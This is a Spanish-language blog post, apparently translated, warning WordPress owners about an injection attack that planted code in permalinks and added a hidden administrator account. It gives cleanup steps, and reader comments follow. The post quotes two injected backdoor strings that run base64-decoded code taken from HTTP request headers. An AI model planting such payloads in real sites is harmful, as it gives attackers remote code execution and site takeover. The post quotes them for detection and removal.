Muchos sitios están siendo afectados por un ataque SQL reciente donde se inyectan códigos en su sitio. Esta inyección de MySQL afecta sus permalinks haciéndolos ineficaces. Como resultado, las URLs de sus publicaciones de blog no funcionarán. Numerosos blogs de WordPress fueron objetivo de este ataque. Gracias a Andy Soward por llamar nuestra atención sobre esto.
Uno de los siguientes códigos se agregó a su estructura de permalinks debido a este ataque:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Estas comillas se agregaron a todos los permalinks de su sitio y solo se pueden cambiar si se eliminan manualmente.
Para solucionar esto, vaya a:
Configuración > Permalinks y elimine el código anterior y reemplace su código predeterminado.
Lo siguiente que debe hacer es ir a Usuarios. Verá que hay más de un administrador. No verá sus nombres listados, pero verá que el recuento aumentó. Así que lo que debe hacer es mirar a todos los usuarios y encontrar al último que se registró. Pase el mouse sobre ese usuario y obtenga el enlace. Cambie el código userid= sumando 1 a ese número. Entonces, si el último usuario que puede ver era el usuario #2, agréguele 1 y hágalo 3. Debería encontrar que el administrador oculto tiene un código extraño como nombre. Elimine el código y conviértalo en suscriptor. Luego regrese y elimínelo.
Esto debería solucionar el problema. También puede eliminarlo simplemente yendo a su PHPMyAdmin. Porque verá al usuario allí.
Queríamos difundir esta noticia lo antes posible, para que nuestros usuarios puedan estar actualizados. Por favor, asegúrense de que su blog no esté infectado. Esperamos que WordPress lance una actualización pronto.
Además, si aún no ha implementado algunas de estas medidas para proteger su Área de Administración de WordPress.
ahmed_alaaedin
La base de datos de mi sitio web fue inyectada hace unos días, añadiendo caracteres y palabras extrañas después de cada URL de publicación o página. No pude encontrar nada extraño en la configuración: permalinks o en el menú de usuarios. ¿Qué debo hacer para solucionar este problema, por favor? ¡Mi compañía de hosting tiene una copia de seguridad de la base de datos infectada también!
un usuario de wordpress
me pasó esto dos veces.
la primera vez fue una inyección sql del plugin wassup, esta vez no estoy seguro. mi proveedor de hosting me ha bloqueado.
una vez que restauren mi cuenta, desinstalaré wordpress... ¡Ya tuve suficiente!
Personal editorial
Quizás no sea culpa de WordPress, tal vez la seguridad de tu hosting simplemente no es tan buena...
Administrador
Joey
¿Qué averiguaste con esto? Me acaba de pasar lo mismo. Todos mis sitios de WP en mi cuenta están sufriendo el mismo problema.
lerrkin
Hola.
La URL interesante https://014.leahstevensyj.workers.dev/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ enlazada desde aquí muestra una página en blanco.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Personal editorial
Agradecemos mucho este comentario, el problema no era con WP Super Cache, creemos que fue el plugin llamado WP External Link. Desinstalamos y reinstalamos WP-Super Cache dos veces, pero luego comparamos el servidor de desarrollo donde todo funcionaba bien. La diferencia era este plugin. Cuando quitamos ese plugin, funcionó. Ahora puedes leer esa publicación.
Administrador
lerrkin
Maybe that was WP External Link and Super Cache conflict…
Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible
So last Super Cache ver. promises to do not html validity check.
¡Oh, estoy leyendo!
¡Muchas gracias!
Roseli A. Bakar
Thanks for highlighting this